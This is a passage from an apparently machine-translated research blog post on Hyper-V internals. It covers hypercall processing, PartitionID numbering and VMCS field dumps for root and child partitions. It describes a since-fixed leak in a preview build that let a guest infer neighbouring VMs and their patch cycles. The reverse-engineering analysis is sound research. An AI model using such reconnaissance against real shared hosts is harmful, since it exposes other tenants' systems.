<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of loop iterations must be greater than the number of running VMs + number of overloaded since the start VM hypervisor. After restarting the hypervisor numbering of all sections begins again. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These data are available for the following two reasons:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The section PartitionID generated by simply adding 1 to the last used PartitionID.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When processing a hypercall the hypervisor first checks the validity of the transferred PartitionID and just in case whats the referred PartitionID active partition, it checks the rights to perform hypercall.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This feature hypervisor can be used to determine the number of virtual machines running on a given host server. For the name of the host server, you can peek in the registry of the guest OS under HKLM \ Software \ Microsoft \ Virtual Machine \ Guest \ Parameter, which contains data on the host operating system, transmitted by Key Value Pair Integration Component, which is normally enabled by default. Also controlled restarting the virtual machine on the second Monday of the month and secure it PartitionID (there is quite a high probability that he will be the last in the list of active VM), you can determine whether a virtual neighbors on their servers coming out every second Tuesday security fixes. However, the reality is quite difficult to imagine that someone will need this information ...</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This hypervisor behavior could be observed in the assembly 6.3.9431.0 (Windows Server 2012 R2 Preview), but Microsoft recognized this behavior as "unexpected behavior" and eliminated him in the assembly 6.3.9600.16384 ". The TLFS changes were made to allow for the enforcement of such hypercall behavior only from root-partition.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Statement which is processing vmcall in the hypervisor runs roughly as follows:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">check ring protection in which the statement has been issued, if the statement was executed in ring 3, then processing stops;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if the instruction is executed in ring0, it checks, whether at the same processor LongMode.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">depending on the operating mode of the processor to perform two different procedures, the logic is quite similar;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">each procedure loads a pointer to an array of structures that contain the parameters necessary for processing each of hypercall 0 to 8C (decryption codes listed in hypercall Hypervisor Top-Level Functional Specification: Windows Server 2012 R2. Appendix B: Hypercall Code Reference). One of the elements of each structure is a pointer to a procedure for processing hypercall:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 71.4pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; clear: left; color: black; float: left; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; margin-bottom: 1em; margin-right: 1em; text-decoration: none; vertical-align: baseline;"><img height="258" src="https://lh3.googleusercontent.com/LdLAKiaxTdtTC6xpdTUnCC0RB2OyT0FabWxMbS1_l0AijNtYvOP2BX6rOCjIfjv1gwr9C2qFbL4omSVBbk9NKmc_gDCihqw-3L_PWDKa4HT_I8gQE1giGfs81DmRMDdIGn6DfUCX6dQl_Ioc" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="565" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 70.9pt; margin-top: 0pt; text-align: justify; text-indent: -14.2pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then there is a check which way the hypervisor have been transferred parameters through memory or through the registers (in this case, the fast call bit in EAX before hypercall should equal 1).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 70.9pt; margin-top: 0pt; text-align: justify; text-indent: -14.2pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then call the corresponding function.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, some of the important fields VMCS were obtained using the script display_vmcs.py after VM exit:</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root partition</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child partition</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CPU_BASED_VM_EXEC_CONTROL = 0xb6206dfa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TSC offsetting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HLT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MWAIT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RDPMC exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TPR shadow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use I/O bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use MSR bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MONITOR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Activate secondary controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_A = 0x4e06000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_A_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_B = 0x4e07000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_B_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXCEPTION_BITMAP = 0x40000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSR_BITMAP = 0x4e08000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSR_BITMAP_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PIN_BASED_VM_EXEC_CONTROL = 0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">External-interrupt exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NMI exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SECONDARY_VM_EXEC_CONTROL = 0x2a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable EPT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable RDTSCP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable VPID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_ENTRY_CONTROLS = 0x13ff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IA-32e mode guest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_EXIT_CONTROLS = 0x3efff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Save debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host address space size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Acknowledge interrupt on exit</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CPU_BASED_VM_EXEC_CONTROL = 0xb5a06dfa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TSC offsetting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HLT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MWAIT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RDPMC exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TPR shadow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MOV-DR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Unconditional I/O exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use MSR bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MONITOR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Activate secondary controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR0_GUEST_HOST_MASK = 0xffffffe1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR0_READ_SHADOW = 0x8001003b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR4_GUEST_HOST_MASK = 0xfffff874</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR4_READ_SHADOW = 0x406f8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXCEPTION_BITMAP = 0x40000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR0 = 0x8001003b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR3 = 0x185000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR4 = 0x426f9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_RIP = 0x839b1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_RSP = 0x8870f8a4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HOST_CR0 = 0x80010031</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PIN_BASED_VM_EXEC_CONTROL = 0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">External-interrupt exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NMI exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SECONDARY_VM_EXEC_CONTROL = 0x62</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable EPT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable VPID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WBINVD exiting</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_ENTRY_CONTROLS = 0x11ff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_EXIT_CONTROLS = 0x3efff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
